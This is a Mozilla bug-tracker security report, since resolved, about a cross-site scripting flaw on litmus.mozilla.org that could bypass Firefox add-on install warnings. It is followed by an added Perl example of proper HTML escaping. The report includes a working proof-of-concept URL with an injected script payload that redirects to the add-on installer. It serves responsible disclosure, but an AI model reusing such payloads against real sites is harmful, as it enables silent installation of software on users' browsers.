Closed
Bug 718448
Opened 12 years ago
Closed 8 years ago
XSS vulnerability on litmus.mozilla.org allows circumventing add-on source checks in Firefox
Categories
(Webtools Graveyard :: Litmus, defect)
Webtools Graveyard
Litmus
Tracking
(Not tracked)
RESOLVED
WORKSFORME
People
(Reporter: jwkbugzilla, Unassigned)
Details
(Keywords: wsec-xss)
Please see the example link:

https://litmus.mozilla.org/advanced_search.cgi?search_field1=comment&match_criteria1=regexp&search_value1=8848484&search_field2=build_id&match_criteria2=%3Cscript%3Ewindow%2Elocation%2Ehref=%22https%3A%2F%2Faddons.mozilla.org%2Fservices%2Finstall.php%3Faddon_id%3D1865%26addon_name%3DGreatest%20Add-on%20Ever%22%3C%2Fscript%3E&search_value2=test

This will abuse an XSS vulnerability in litmus.mozilla.org to redirect to https://addons.mozilla.org/services/install.php with a mozilla.org referrer. This page allows installing any AMO add-on if the referring website is a Mozilla site - so in this example you will get prompted to install Adblock Plus without the usual warnings.

Regardless of the litmus.mozilla.org vulnerability, I find the functionality of this install script concerning - it allows using any XSS vulnerability on any Mozilla site to disable security warnings in Firefox when installing add-ons.

As to litmus.mozilla.org, the web application seems riddled with bad security practices. Here I abused the non-existent escaping of the match_criteriaN parameter; other parameters are only escaped via quotemeta, however - this is clearly insufficient for strings inserted into HTML even though exploiting this vulnerability isn't simple. It's also compiling SQL queries in a way that makes me suspect SQL vulnerabilities if one digs a little.
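
The point about quotemeta in the description above, as an added example that is not part of the original report and is not Litmus code: it contrasts quotemeta with HTML encoding and shows allowlist validation for a match_criteriaN value. The helper names `html_escape` and `validate_criteria`, and every allowlist entry other than `regexp`, are assumptions.

```perl
#!/usr/bin/perl
# Added example (not Litmus code): quotemeta() is a regex-quoting function,
# not an HTML encoder. Shown beside validation plus output encoding.
use strict;
use warnings;

# Assumed allowlist: only "regexp" appears in the report; the other
# entries are hypothetical placeholders for the application's real set.
my %ALLOWED_CRITERIA = map { $_ => 1 } qw(regexp contains_all exact);

# Minimal HTML encoder for element content and quoted attribute values.
sub html_escape {
    my ($s) = @_;
    my %ent = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$ent{$1}/g;
    return $s;
}

# Reject anything outside the allowlist instead of trying to clean it.
sub validate_criteria {
    my ($value) = @_;
    return exists $ALLOWED_CRITERIA{$value} ? $value : undef;
}

# Constructed input, shaped like a markup-bearing parameter value.
my $input = '<script>x</script>';

# quotemeta only prefixes non-word characters with backslashes. HTML does
# not treat a backslash as an escape, so the angle brackets survive.
my $quoted  = quotemeta($input);
my $encoded = html_escape($input);

print "quotemeta:   $quoted\n";
print "still has <: ", ($quoted  =~ /</ ? "yes" : "no"), "\n";
print "html_escape: $encoded\n";
print "still has <: ", ($encoded =~ /</ ? "yes" : "no"), "\n";

# A value meant to be one of a fixed set is validated on input and
# still encoded at the point where it is written into the page.
for my $criteria ('regexp', $input) {
    my $ok = validate_criteria($criteria);
    if (defined $ok) {
        print "accepted: <td>", html_escape($ok), "</td>\n";
    } else {
        print "rejected: ", html_escape($criteria), "\n";
    }
}
```
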
Updated•12 years ago
Group: websites-security → webtools-security
Component: Other → Litmus
Product: Websites → Webtools
QA Contact: other → litmus
Version: unspecified → other
Comment 1•11 years ago
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Reporter
Comment 2•8 years ago
Resolving WORKSFORME since litmus.mozilla.org is gone for good. I think that this can be made public now.
Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(amuntner)
Resolution: --- → WORKSFORME
Updated•8 years ago
Group: webtools-security
Flags: needinfo?(amuntner)
Assignee
Updated•8 years ago
Product: Webtools → Webtools Graveyard